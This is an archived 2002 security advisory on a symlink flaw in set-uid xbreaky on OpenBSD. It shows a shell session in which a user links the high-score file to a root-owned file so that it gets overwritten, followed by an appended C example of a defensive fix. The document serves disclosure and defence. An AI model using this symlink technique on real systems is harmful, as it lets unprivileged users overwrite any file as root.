13th Sep 2002 [SBWID-5685]
COMMAND
		xbreaky symlink vulnerability
SYSTEMS AFFECTED
		xbreaky versions prior to 0.0.5 on OpenBSD
PROBLEM
		Marco van Berkum [[email protected]] [http://ws.obit.nl] with the help
		of Dennis Oelkers:
		By default xbreaky is installed as suid and can be abused to overwrite
		any file on the filesystem, by any user.
		 Exploit
		 -------
		xbreaky uses $HOME/.breakyhighscores to write the highscores to, when
		$HOME/.breakyhighscores is symlinked to another file (*any* file) it
		simply overwrites it as root user.
		 Example
		 -------
		
		root@animal:/home/marco# echo "bla" >rootfile
		root@animal:/home/marco# chmod 600 rootfile
		root@animal:/home/marco# exit
		logout
		marco@animal:~$ ln -s rootfile .breakyhighscores
		marco@animal:~$ xbreaky
		
		Now I play a game and set highscore as user "lol", then I exit the
		game. It's a nice game btw :)
		
		marco@animal:~$ cat rootfile
		cat: rootfile: Permission denied
		marco@animal:~$ su -
		Password:
		root@animal:~# cat /home/marco/rootfile
		lol <- voila, our highscore user
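
Added example, not part of the advisory or of xbreaky's code: one way a set-uid program can write a per-user score file without the overwrite shown above, by dropping privileges first and refusing a symlinked path with O_NOFOLLOW. The function names and the file name used in main() are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Permanently give up set-uid/set-gid privileges before touching any
 * user-controlled path. Returns 0 on success, -1 otherwise. */
int drop_privileges(void)
{
    if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
        return -1;
    return (geteuid() == getuid() && getegid() == getgid()) ? 0 : -1;
}

/* Open the score file for writing without following a symlink in the last
 * path component. Returns a file descriptor, or -1 if the path is refused. */
int open_scores(const char *path)
{
    struct stat st;
    /* O_NOFOLLOW makes open() fail if path itself is a symlink.
     * No O_TRUNC: nothing is modified until the checks below pass. */
    int fd = open(path, O_WRONLY | O_CREAT | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* fstat() the descriptor, not the path, so the object checked is the
     * object written to (no window between check and use). */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_uid != getuid() ||   /* must belong to the invoking user */
        st.st_nlink != 1 ||        /* refuse hard links to other files */
        ftruncate(fd, 0) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

int main(void)
{
    if (drop_privileges() != 0)
        return 1;
    int fd = open_scores(".breakyhighscores.example"); /* hypothetical name */
    if (fd < 0) { perror("refusing score file"); return 1; }
    dprintf(fd, "lol\n");
    return close(fd) != 0;
}
```

Dropping privileges alone already limits the write to files the invoking user could modify anyway; the O_NOFOLLOW and fstat() checks additionally keep the program from being steered to another of the user's files through a link.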
		
SOLUTION
	
